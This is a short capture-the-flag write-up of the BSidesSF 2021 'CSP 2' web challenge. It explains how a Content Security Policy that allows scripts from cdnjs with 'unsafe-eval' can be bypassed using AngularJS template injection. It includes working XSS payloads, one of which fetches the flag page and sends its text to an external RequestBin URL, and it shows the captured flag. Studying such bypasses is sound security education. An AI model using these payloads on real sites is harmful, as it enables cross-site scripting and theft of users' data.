Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-
challenges.html#csp-2](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-
challenges.html#csp-2) for writeup with images.

\---

This challenge was simmilar to the last one where we need to send an XSS  
payload to an admin to get the flag.

Checking the CSP this time we have:

```javascript  
script-src 'self' cdnjs.cloudflare.com 'unsafe-eval'; default-src 'self'
'unsafe-inline'; connect-src *; report-uri /csp_report  
```

This one has the issue of using `script-src` from cdnjs.cloudflare.com. If we
can  
use a script from CloudFlare to execute arbitrary JS, we win!

To do this we can use Angular to evaluate JS within an Angular context.  
Here's a simple example to test:

```javascript  
<script
src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>  
<x ng-app>{{$new.constructor('alert(1)')()}}  
```

This payload seems to work!

Now we just need to exfiltrate the flag like the last challenge using fetch.

```javascript  
<script
src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.7.0/angular.min.js></script>  
<x ng-app>{{$new.constructor('fetch("/csp-two-flag").then(x =>
x.text()).then(t => fetch("https://requestbin.io/1m40bkh1?x=" + t))')()}}  
```

Then we get the Flag on RequestBin:

```  
CTF{Can_Still_Pwn}  
```  

Original writeup (https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web-
challenges.html#csp-2).